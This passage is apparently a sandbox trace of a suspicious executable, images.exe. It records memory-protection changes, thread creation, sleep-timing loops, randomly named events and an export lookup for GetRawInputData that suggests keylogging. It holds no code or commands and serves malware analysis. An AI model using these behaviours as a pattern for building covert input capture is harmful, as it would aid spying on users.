lpAddress=0x2a04000, dwSize=0x4a00, flNewProtect=0x2, lpflOldProtect=0x19fe58 | out: lpflOldProtect=0x19fe58*=0x4) returned 1 [0295.645] VirtualProtect (in: lpAddress=0x2a09000, dwSize=0x600, flNewProtect=0x4, lpflOldProtect=0x19fe58 | out: lpflOldProtect=0x19fe58*=0x4) returned 1 [0295.645] VirtualProtect (in: lpAddress=0x2b3f000, dwSize=0x2e00, flNewProtect=0x2, lpflOldProtect=0x19fe58 | out: lpflOldProtect=0x19fe58*=0x4) returned 1 [0295.645] VirtualProtect (in: lpAddress=0x2b42000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19fe58 | out: lpflOldProtect=0x19fe58*=0x4) returned 1 [0295.645] VirtualProtect (in: lpAddress=0x2b43000, dwSize=0x200, flNewProtect=0x2, lpflOldProtect=0x19fe58 | out: lpflOldProtect=0x19fe58*=0x4) returned 1 [0295.645] NtFlushInstructionCache (ProcessHandle=0xffffffff, BaseAddress=0x0, NumberOfBytesToFlush=0x0) returned 0x0 [0295.652] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x29f5ce2, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a4 [0295.652] Sleep (dwMilliseconds=0x320) [0296.513] Sleep (dwMilliseconds=0x320) [0297.358] Sleep (dwMilliseconds=0x320) [0298.231] Sleep (dwMilliseconds=0x320) [0299.519] Sleep (dwMilliseconds=0x320) [0300.597] Sleep (dwMilliseconds=0x320) [0301.424] Sleep (dwMilliseconds=0x320) [0302.283] Sleep (dwMilliseconds=0x320) [0303.424] Sleep (dwMilliseconds=0x320) [0304.450] Sleep (dwMilliseconds=0x320) [0305.328] Sleep (dwMilliseconds=0x320) [0306.305] Sleep (dwMilliseconds=0x320) [0307.281] Sleep (dwMilliseconds=0x320) [0308.240] Sleep (dwMilliseconds=0x320) [0309.132] Sleep (dwMilliseconds=0x320) [0309.981] Sleep (dwMilliseconds=0x320) [0310.814] Sleep (dwMilliseconds=0x320) [0312.045] Sleep (dwMilliseconds=0x320) [0313.032] Sleep (dwMilliseconds=0x320) [0313.953] Sleep (dwMilliseconds=0x320) [0314.894] Sleep (dwMilliseconds=0x320) [0315.768] Sleep (dwMilliseconds=0x320) [0317.017] Sleep (dwMilliseconds=0x320) [0317.990] Sleep (dwMilliseconds=0x320) [0319.272] Sleep (dwMilliseconds=0x320) [0320.287] Sleep (dwMilliseconds=0x320) [0320.678] Sleep (dwMilliseconds=0x320) [0321.586] Sleep (dwMilliseconds=0x320) Thread: id = 64 os_tid = 0xfcc Thread: id = 70 os_tid = 0xcc0 [0295.660] GetCommandLineA () returned="\"C:\\ProgramData\\images.exe\"" [0295.660] GetStartupInfoA (in: lpStartupInfo=0x2c8ff3c | out: lpStartupInfo=0x2c8ff3c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\ProgramData\\images.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0295.660] GetProcessHeap () returned 0x650000 [0295.660] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x80) returned 0x65a328 [0295.661] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x1a8 [0295.661] GetProcessHeap () returned 0x650000 [0295.661] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x65e890 [0295.661] GetProcessHeap () returned 0x650000 [0295.661] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6622d0 [0295.661] GetProcessHeap () returned 0x650000 [0295.661] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x28) returned 0x668c98 [0295.661] GetProcessHeap () returned 0x650000 [0295.661] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x50) returned 0x65a3b0 [0295.661] GetProcessHeap () returned 0x650000 [0295.661] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xa0) returned 0x659088 [0295.661] CoInitialize (pvReserved=0x0) returned 0x0 [0295.662] CoCreateInstance (in: rclsid=0x2a045e0*(Data1=0x62be5d10, Data2=0x60eb, Data3=0x11d0, Data4=([0]=0xbd, [1]=0x3b, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0xce, [7]=0x86)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x2a073f0*(Data1=0x29840822, Data2=0x5b84, Data3=0x11d0, Data4=([0]=0xbd, [1]=0x3b, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0xce, [7]=0x86)), ppv=0x2c8fef8 | out: ppv=0x2c8fef8*=0xa504a0) returned 0x0 [0295.809] SystemDeviceEnum:ICreateDevEnum:CreateClassEnumerator (in: This=0xa504a0, clsidDeviceClass=0x2a045d0*(Data1=0x860bb310, Data2=0x5d01, Data3=0x11d0, Data4=([0]=0xbd, [1]=0x3b, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0xce, [7]=0x86)), ppenumMoniker=0x2c8fefc, dwFlags=0x0 | out: ppenumMoniker=0x2c8fefc*=0x0) returned 0x1 [0295.884] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x2d60000 [0295.885] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x2d70000 [0295.885] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x2d90000 [0295.885] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0295.885] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x2e30000 [0295.886] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x2e40000 [0295.886] GetProcessHeap () returned 0x650000 [0295.886] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x19) returned 0x66e280 [0295.886] GetProcessHeap () returned 0x650000 [0295.886] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x19) returned 0x66e1e0 [0295.886] GetProcessHeap () returned 0x650000 [0295.886] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x19) returned 0x66e370 [0295.886] GetProcessHeap () returned 0x650000 [0295.886] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x19) returned 0x66e208 [0295.886] GetProcessHeap () returned 0x650000 [0295.886] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x19) returned 0x66e118 [0295.886] GetProcessHeap () returned 0x650000 [0295.886] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x19) returned 0x66e0f0 [0295.887] Sleep (dwMilliseconds=0x1) [0295.899] GetTickCount () returned 0x1df4f [0295.899] Sleep (dwMilliseconds=0x1) [0295.936] GetTickCount () returned 0x1df7e [0295.936] Sleep (dwMilliseconds=0x1) [0296.001] GetTickCount () returned 0x1dfbc [0296.002] Sleep (dwMilliseconds=0x1) [0296.055] GetTickCount () returned 0x1dfeb [0296.055] Sleep (dwMilliseconds=0x1) [0296.097] GetTickCount () returned 0x1e01a [0296.097] Sleep (dwMilliseconds=0x1) [0296.124] GetTickCount () returned 0x1e039 [0296.124] Sleep (dwMilliseconds=0x1) [0296.158] GetTickCount () returned 0x1e058 [0296.158] Sleep (dwMilliseconds=0x1) [0296.219] GetTickCount () returned 0x1e097 [0296.219] Sleep (dwMilliseconds=0x1) [0296.285] GetTickCount () returned 0x1e0d5 [0296.285] Sleep (dwMilliseconds=0x1) [0296.349] GetTickCount () returned 0x1e114 [0296.349] Sleep (dwMilliseconds=0x1) [0296.390] GetTickCount () returned 0x1e143 [0296.390] Sleep (dwMilliseconds=0x1) [0296.409] GetTickCount () returned 0x1e152 [0296.409] Sleep (dwMilliseconds=0x1) [0296.447] GetTickCount () returned 0x1e172 [0296.447] Sleep (dwMilliseconds=0x1) [0296.467] GetTickCount () returned 0x1e191 [0296.467] Sleep (dwMilliseconds=0x1) [0296.521] GetTickCount () returned 0x1e1c0 [0296.521] Sleep (dwMilliseconds=0x1) [0296.554] GetTickCount () returned 0x1e1df [0296.554] Sleep (dwMilliseconds=0x1) [0296.571] GetTickCount () returned 0x1e1ef [0296.571] Sleep (dwMilliseconds=0x1) [0296.591] GetTickCount () returned 0x1e1fe [0296.591] Sleep (dwMilliseconds=0x1) [0296.624] GetTickCount () returned 0x1e22d [0296.624] Sleep (dwMilliseconds=0x1) [0296.688] GetTickCount () returned 0x1e26c [0296.689] Sleep (dwMilliseconds=0x1) [0296.736] GetTickCount () returned 0x1e29a [0296.736] Sleep (dwMilliseconds=0x1) [0296.783] GetTickCount () returned 0x1e2c9 [0296.783] Sleep (dwMilliseconds=0x1) [0296.829] GetTickCount () returned 0x1e2f8 [0296.829] Sleep (dwMilliseconds=0x1) [0296.855] GetTickCount () returned 0x1e308 [0296.855] Sleep (dwMilliseconds=0x1) [0296.890] GetTickCount () returned 0x1e337 [0296.890] Sleep (dwMilliseconds=0x1) [0296.936] GetTickCount () returned 0x1e366 [0296.936] Sleep (dwMilliseconds=0x1) [0296.956] GetTickCount () returned 0x1e375 [0296.956] Sleep (dwMilliseconds=0x1) [0296.992] GetTickCount () returned 0x1e394 [0296.992] Sleep (dwMilliseconds=0x1) [0297.061] GetTickCount () returned 0x1e3e3 [0297.061] Sleep (dwMilliseconds=0x1) [0297.080] GetTickCount () returned 0x1e3f2 [0297.080] Sleep (dwMilliseconds=0x1) [0297.097] GetTickCount () returned 0x1e402 [0297.097] Sleep (dwMilliseconds=0x1) [0297.139] GetTickCount () returned 0x1e431 [0297.139] Sleep (dwMilliseconds=0x1) [0297.186] GetTickCount () returned 0x1e460 [0297.186] Sleep (dwMilliseconds=0x1) [0297.233] GetTickCount () returned 0x1e48e [0297.233] Sleep (dwMilliseconds=0x1) [0297.262] GetTickCount () returned 0x1e49e [0297.262] Sleep (dwMilliseconds=0x1) [0297.311] GetTickCount () returned 0x1e4dd [0297.311] Sleep (dwMilliseconds=0x1) [0297.358] GetTickCount () returned 0x1e50b [0297.358] Sleep (dwMilliseconds=0x1) [0297.383] GetTickCount () returned 0x1e51b [0297.383] Sleep (dwMilliseconds=0x1) [0297.393] GetTickCount () returned 0x1e52b [0297.394] Sleep (dwMilliseconds=0x1) [0297.409] GetTickCount () returned 0x1e53a [0297.410] Sleep (dwMilliseconds=0x1) [0297.439] GetTickCount () returned 0x1e55a [0297.439] Sleep (dwMilliseconds=0x1) [0297.452] GetTickCount () returned 0x1e569 [0297.453] Sleep (dwMilliseconds=0x1) [0297.480] GetTickCount () returned 0x1e579 [0297.480] Sleep (dwMilliseconds=0x1) [0297.484] GetTickCount () returned 0x1e588 [0297.484] Sleep (dwMilliseconds=0x1) [0297.500] GetTickCount () returned 0x1e598 [0297.500] Sleep (dwMilliseconds=0x1) [0297.518] GetTickCount () returned 0x1e5a8 [0297.518] Sleep (dwMilliseconds=0x1) [0297.535] GetTickCount () returned 0x1e5b7 [0297.535] Sleep (dwMilliseconds=0x1) [0297.559] GetTickCount () returned 0x1e5c7 [0297.559] Sleep (dwMilliseconds=0x1) [0297.561] GetTickCount () returned 0x1e5d7 [0297.561] Sleep (dwMilliseconds=0x1) [0297.582] GetTickCount () returned 0x1e5e6 [0297.582] Sleep (dwMilliseconds=0x1) [0297.613] GetTickCount () returned 0x1e605 [0297.613] Sleep (dwMilliseconds=0x1) [0297.623] GetTickCount () returned 0x1e615 [0297.623] Sleep (dwMilliseconds=0x1) [0297.700] GetTickCount () returned 0x1e654 [0297.700] Sleep (dwMilliseconds=0x1) [0297.726] GetTickCount () returned 0x1e673 [0297.726] Sleep (dwMilliseconds=0x1) [0297.735] GetTickCount () returned 0x1e682 [0297.736] Sleep (dwMilliseconds=0x1) [0297.755] GetTickCount () returned 0x1e692 [0297.755] Sleep (dwMilliseconds=0x1) [0297.779] GetTickCount () returned 0x1e6a2 [0297.779] Sleep (dwMilliseconds=0x1) [0297.796] GetTickCount () returned 0x1e6c1 [0297.796] Sleep (dwMilliseconds=0x1) [0297.837] GetTickCount () returned 0x1e6e0 [0297.837] Sleep (dwMilliseconds=0x1) [0297.851] GetTickCount () returned 0x1e6f0 [0297.851] lstrlenA (lpString="bEc0OkMmLq") returned 10 [0297.851] lstrlenA (lpString="bEc0OkMmLq") returned 10 [0297.851] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2e50000 [0297.852] lstrcpyA (in: lpString1=0x2e50000, lpString2="bEc0OkMmLq" | out: lpString1="bEc0OkMmLq") returned="bEc0OkMmLq" [0297.852] VirtualFree (lpAddress=0x2d60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0297.915] lstrlenA (lpString="bEc0OkMmLq") returned 10 [0297.915] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x2d60000 [0297.929] lstrcatA (in: lpString1="", lpString2="bEc0OkMmLq" | out: lpString1="bEc0OkMmLq") returned="bEc0OkMmLq" [0297.929] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="bEc0OkMmLq") returned 0x22c [0297.929] VirtualFree (lpAddress=0x2e50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0297.930] lstrlenA (lpString="fqUqcez07A") returned 10 [0297.930] lstrlenA (lpString="fqUqcez07A") returned 10 [0297.930] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2e50000 [0297.931] lstrcpyA (in: lpString1=0x2e50000, lpString2="fqUqcez07A" | out: lpString1="fqUqcez07A") returned="fqUqcez07A" [0297.931] VirtualFree (lpAddress=0x2d70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0297.931] lstrlenA (lpString="fqUqcez07A") returned 10 [0297.931] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x2d70000 [0297.931] lstrcatA (in: lpString1="", lpString2="fqUqcez07A" | out: lpString1="fqUqcez07A") returned="fqUqcez07A" [0297.931] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="fqUqcez07A") returned 0x230 [0297.931] VirtualFree (lpAddress=0x2e50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0297.932] lstrlenA (lpString="C4w8NKlm7K") returned 10 [0297.932] lstrlenA (lpString="C4w8NKlm7K") returned 10 [0297.932] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2e50000 [0297.932] lstrcpyA (in: lpString1=0x2e50000, lpString2="C4w8NKlm7K" | out: lpString1="C4w8NKlm7K") returned="C4w8NKlm7K" [0297.932] VirtualFree (lpAddress=0x2d90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0297.933] lstrlenA (lpString="C4w8NKlm7K") returned 10 [0297.933] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x2d90000 [0297.934] lstrcatA (in: lpString1="", lpString2="C4w8NKlm7K" | out: lpString1="C4w8NKlm7K") returned="C4w8NKlm7K" [0297.934] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="C4w8NKlm7K") returned 0x258 [0297.934] VirtualFree (lpAddress=0x2e50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0297.934] lstrlenA (lpString="000ogGRGpQ") returned 10 [0297.934] lstrlenA (lpString="000ogGRGpQ") returned 10 [0297.934] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2e50000 [0297.935] lstrcpyA (in: lpString1=0x2e50000, lpString2="000ogGRGpQ" | out: lpString1="000ogGRGpQ") returned="000ogGRGpQ" [0297.935] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0297.935] lstrlenA (lpString="000ogGRGpQ") returned 10 [0297.936] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0297.936] lstrcatA (in: lpString1="", lpString2="000ogGRGpQ" | out: lpString1="000ogGRGpQ") returned="000ogGRGpQ" [0297.936] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="000ogGRGpQ") returned 0x25c [0297.936] VirtualFree (lpAddress=0x2e50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0297.937] lstrlenA (lpString="Y8tCKCZWDw") returned 10 [0297.937] lstrlenA (lpString="Y8tCKCZWDw") returned 10 [0297.937] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2e50000 [0297.938] lstrcpyA (in: lpString1=0x2e50000, lpString2="Y8tCKCZWDw" | out: lpString1="Y8tCKCZWDw") returned="Y8tCKCZWDw" [0297.938] VirtualFree (lpAddress=0x2e30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0297.939] lstrlenA (lpString="Y8tCKCZWDw") returned 10 [0297.939] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x2e30000 [0297.939] lstrcatA (in: lpString1="", lpString2="Y8tCKCZWDw" | out: lpString1="Y8tCKCZWDw") returned="Y8tCKCZWDw" [0297.939] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="Y8tCKCZWDw") returned 0x260 [0297.939] VirtualFree (lpAddress=0x2e50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0297.940] lstrlenA (lpString="J2yCo44WWy") returned 10 [0297.940] lstrlenA (lpString="J2yCo44WWy") returned 10 [0297.940] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2e50000 [0297.940] lstrcpyA (in: lpString1=0x2e50000, lpString2="J2yCo44WWy" | out: lpString1="J2yCo44WWy") returned="J2yCo44WWy" [0297.940] VirtualFree (lpAddress=0x2e40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0297.941] lstrlenA (lpString="J2yCo44WWy") returned 10 [0297.941] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x2e40000 [0297.941] lstrcatA (in: lpString1="", lpString2="J2yCo44WWy" | out: lpString1="J2yCo44WWy") returned="J2yCo44WWy" [0297.941] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="J2yCo44WWy") returned 0x264 [0297.941] VirtualFree (lpAddress=0x2e50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0297.943] GetProcessHeap () returned 0x650000 [0297.943] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x54) returned 0x6586c8 [0297.943] GetProcessHeap () returned 0x650000 [0297.943] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x7c) returned 0x658478 [0297.943] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x268 [0297.943] LoadLibraryW (lpLibFileName="User32.dll") returned 0x756d0000 [0297.944] lstrcmpA (lpString1="ActivateKeyboardLayout", lpString2="GetRawInputData") returned -1 [0297.949] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="GetRawInputData") returned -1 [0297.949] lstrcmpA (lpString1="AdjustWindowRect", lpString2="GetRawInputData") returned -1 [0297.949] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="GetRawInputData") returned -1 [0297.949] lstrcmpA (lpString1="AlignRects", lpString2="GetRawInputData") returned -1 [0297.949] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="GetRawInputData") returned -1 [0297.949] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="GetRawInputData") returned -1 [0297.949] lstrcmpA (lpString1="AnimateWindow", lpString2="GetRawInputData") returned -1 [0297.949] lstrcmpA (lpString1="AnyPopup", lpString2="GetRawInputData") returned -1 [0297.949] lstrcmpA (lpString1="AppendMenuA", lpString2="GetRawInputData") returned -1 [0297.949] lstrcmpA (lpString1="AppendMenuW", lpString2="GetRawInputData") returned -1 [0297.949] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="GetRawInputData") returned -1 [0297.949] lstrcmpA (lpString1="AttachThreadInput", lpString2="GetRawInputData") returned -1 [0297.949] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="GetRawInputData") returned -1 [0297.949] lstrcmpA (lpString1="BeginPaint", lpString2="GetRawInputData") returned -1 [0297.949] lstrcmpA (lpString1="BlockInput", lpString2="GetRawInputData") returned -1 [0297.949] lstrcmpA (lpString1="BringWindowToTop", lpString2="GetRawInputData") returned -1 [0297.949] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="GetRawInputData") returned -1 [0297.949] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="GetRawInputData") returned -1 [0297.949] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="GetRawInputData") returned -1 [0297.949] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="GetRawInputData") returned -1 [0297.949] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="GetRawInputData") returned -1 [0297.950] lstrcmpA (lpString1="BuildReasonArray", lpString2="GetRawInputData") returned -1 [0297.950] lstrcmpA (lpString1="CalcMenuBar", lpString2="GetRawInputData") returned -1 [0297.950] lstrcmpA (lpString1="CalculatePopupWindowPosition", lpString2="GetRawInputData") returned -1 [0297.950] lstrcmpA (lpString1="CallMsgFilter", lpString2="GetRawInputData") returned -1 [0297.950] lstrcmpA (lpString1="CallMsgFilterA", lpString2="GetRawInputData") returned -1 [0297.950] lstrcmpA (lpString1="CallMsgFilterW", lpString2="GetRawInputData") returned -1 [0297.950] lstrcmpA (lpString1="CallNextHookEx", lpString2="GetRawInputData") returned -1 [0297.950] lstrcmpA (lpString1="CallWindowProcA", lpString2="GetRawInputData") returned -1 [0297.950] lstrcmpA (lpString1="CallWindowProcW", lpString2="GetRawInputData") returned -1 [0297.950] lstrcmpA (lpString1="CancelShutdown", lpString2="GetRawInputData") returned -1 [0297.950] lstrcmpA (lpString1="CascadeChildWindows", lpString2="GetRawInputData") returned -1 [0297.950] lstrcmpA (lpString1="CascadeWindows", lpString2="GetRawInputData") returned -1 [0297.950] lstrcmpA (lpString1="ChangeClipboardChain", lpString2="GetRawInputData") returned -1 [0297.950] lstrcmpA (lpString1="ChangeDisplaySettingsA", lpString2="GetRawInputData") returned -1 [0297.950] lstrcmpA (lpString1="ChangeDisplaySettingsExA", lpString2="GetRawInputData") returned -1 [0297.950] lstrcmpA (lpString1="ChangeDisplaySettingsExW", lpString2="GetRawInputData") returned -1 [0297.950] lstrcmpA (lpString1="ChangeDisplaySettingsW", lpString2="GetRawInputData") returned -1 [0297.950] lstrcmpA (lpString1="ChangeMenuA", lpString2="GetRawInputData") returned -1 [0297.950] lstrcmpA (lpString1="ChangeMenuW", lpString2="GetRawInputData") returned -1 [0297.950] lstrcmpA (lpString1="ChangeWindowMessageFilter", lpString2="GetRawInputData") returned -1 [0297.950] lstrcmpA (lpString1="ChangeWindowMessageFilterEx", lpString2="GetRawInputData") returned -1 [0297.950] lstrcmpA (lpString1="CharLowerA", lpString2="GetRawInputData") returned -1 [0297.950] lstrcmpA (lpString1="CharLowerBuffA", lpString2="GetRawInputData") returned -1 [0297.950] lstrcmpA (lpString1="CharLowerBuffW", lpString2="GetRawInputData") returned -1 [0297.950] lstrcmpA (lpString1="CharLowerW", lpString2="GetRawInputData") returned -1 [0297.950] lstrcmpA (lpString1="CharNextA", lpString2="GetRawInputData") returned -1 [0297.951] lstrcmpA (lpString1="CharNextExA", lpString2="GetRawInputData") returned -1 [0297.951] lstrcmpA (lpString1="CharNextW", lpString2="GetRawInputData") returned -1 [0297.951] lstrcmpA (lpString1="CharPrevA", lpString2="GetRawInputData") returned -1 [0297.951] lstrcmpA (lpString1="CharPrevExA", lpString2="GetRawInputData") returned -1 [0297.951] lstrcmpA (lpString1="CharPrevW", lpString2="GetRawInputData") returned -1 [0297.951] lstrcmpA (lpString1="CharToOemA", lpString2="GetRawInputData") returned -1 [0297.951] lstrcmpA (lpString1="CharToOemBuffA", lpString2="GetRawInputData") returned -1 [0297.951] lstrcmpA (lpString1="CharToOemBuffW", lpString2="GetRawInputData") returned -1 [0297.951] lstrcmpA (lpString1="CharToOemW", lpString2="GetRawInputData") returned -1 [0297.951] lstrcmpA (lpString1="CharUpperA", lpString2="GetRawInputData") returned -1 [0297.951] lstrcmpA (lpString1="CharUpperBuffA", lpString2="GetRawInputData") returned -1 [0297.951] lstrcmpA (lpString1="CharUpperBuffW", lpString2="GetRawInputData") returned -1 [0297.951] lstrcmpA (lpString1="CharUpperW", lpString2="GetRawInputData") returned -1 [0297.951] lstrcmpA (lpString1="CheckDBCSEnabledExt", lpString2="GetRawInputData") returned -1 [0297.951] lstrcmpA (lpString1="CheckDlgButton", lpString2="GetRawInputData") returned -1 [0297.951] lstrcmpA (lpString1="CheckMenuItem", lpString2="GetRawInputData") returned -1 [0297.951] lstrcmpA (lpString1="CheckMenuRadioItem", lpString2="GetRawInputData") returned -1 [0297.951] lstrcmpA (lpString1="CheckProcessForClipboardAccess", lpString2="GetRawInputData") returned -1 [0297.951] lstrcmpA (lpString1="CheckProcessSession", lpString2="GetRawInputData") returned -1 [0297.951] lstrcmpA (lpString1="CheckRadioButton", lpString2="GetRawInputData") returned -1 [0297.951] lstrcmpA (lpString1="CheckWindowThreadDesktop", lpString2="GetRawInputData") returned -1 [0297.951] lstrcmpA (lpString1="ChildWindowFromPoint", lpString2="GetRawInputData") returned -1 [0297.951] lstrcmpA (lpString1="ChildWindowFromPointEx", lpString2="GetRawInputData") returned -1 [0297.952] lstrcmpA (lpString1="CliImmSetHotKey", lpString2="GetRawInputData") returned -1 [0297.952] lstrcmpA (lpString1="ClientThreadSetup", lpString2="GetRawInputData") returned -1 [0297.952] lstrcmpA (lpString1="ClientToScreen", lpString2="GetRawInputData") returned -1 [0297.952] lstrcmpA (lpString1="ClipCursor", lpString2="GetRawInputData") returned -1 [0297.952] lstrcmpA (lpString1="CloseClipboard", lpString2="GetRawInputData") returned -1 [0297.952] lstrcmpA (lpString1="CloseDesktop", lpString2="GetRawInputData") returned -1 [0297.952] lstrcmpA (lpString1="CloseGestureInfoHandle", lpString2="GetRawInputData") returned -1 [0297.952] lstrcmpA (lpString1="CloseTouchInputHandle", lpString2="GetRawInputData") returned -1 [0297.952] lstrcmpA (lpString1="CloseWindow", lpString2="GetRawInputData") returned -1 [0297.952] lstrcmpA (lpString1="CloseWindowStation", lpString2="GetRawInputData") returned -1 [0297.952] lstrcmpA (lpString1="ConsoleControl", lpString2="GetRawInputData") returned -1 [0297.952] lstrcmpA (lpString1="ControlMagnification", lpString2="GetRawInputData") returned -1 [0297.952] lstrcmpA (lpString1="CopyAcceleratorTableA", lpString2="GetRawInputData") returned -1 [0297.952] lstrcmpA (lpString1="CopyAcceleratorTableW", lpString2="GetRawInputData") returned -1 [0297.952] lstrcmpA (lpString1="CopyIcon", lpString2="GetRawInputData") returned -1 [0297.952] lstrcmpA (lpString1="CopyImage", lpString2="GetRawInputData") returned -1 [0297.952] lstrcmpA (lpString1="CopyRect", lpString2="GetRawInputData") returned -1 [0297.952] lstrcmpA (lpString1="CountClipboardFormats", lpString2="GetRawInputData") returned -1 [0297.952] lstrcmpA (lpString1="CreateAcceleratorTableA", lpString2="GetRawInputData") returned -1 [0297.952] lstrcmpA (lpString1="CreateAcceleratorTableW", lpString2="GetRawInputData") returned -1 [0297.952] lstrcmpA (lpString1="CreateCaret", lpString2="GetRawInputData") returned -1 [0297.952] lstrcmpA (lpString1="CreateCursor", lpString2="GetRawInputData") returned -1 [0297.952] lstrcmpA (lpString1="CreateDCompositionHwndTarget", lpString2="GetRawInputData") returned -1 [0297.952] lstrcmpA (lpString1="CreateDesktopA", lpString2="GetRawInputData") returned -1 [0297.952] lstrcmpA (lpString1="CreateDesktopExA", lpString2="GetRawInputData") returned -1 [0297.952] lstrcmpA (lpString1="CreateDesktopExW", lpString2="GetRawInputData") returned -1 [0297.953] lstrcmpA (lpString1="CreateDesktopW", lpString2="GetRawInputData") returned -1 [0297.953] lstrcmpA (lpString1="CreateDialogIndirectParamA", lpString2="GetRawInputData") returned -1 [0297.953] lstrcmpA (lpString1="CreateDialogIndirectParamAorW", lpString2="GetRawInputData") returned -1 [0297.953] lstrcmpA (lpString1="CreateDialogIndirectParamW", lpString2="GetRawInputData") returned -1 [0297.953] lstrcmpA (lpString1="CreateDialogParamA", lpString2="GetRawInputData") returned -1 [0297.953] lstrcmpA (lpString1="CreateDialogParamW", lpString2="GetRawInputData") returned -1 [0297.953] lstrcmpA (lpString1="CreateIcon", lpString2="GetRawInputData") returned -1 [0297.953] lstrcmpA (lpString1="CreateIconFromResource", lpString2="GetRawInputData") returned -1 [0297.953] lstrcmpA (lpString1="CreateIconFromResourceEx", lpString2="GetRawInputData") returned -1 [0297.953] lstrcmpA (lpString1="CreateIconIndirect", lpString2="GetRawInputData") returned -1 [0297.953] lstrcmpA (lpString1="CreateMDIWindowA", lpString2="GetRawInputData") returned -1 [0297.953] lstrcmpA (lpString1="CreateMDIWindowW", 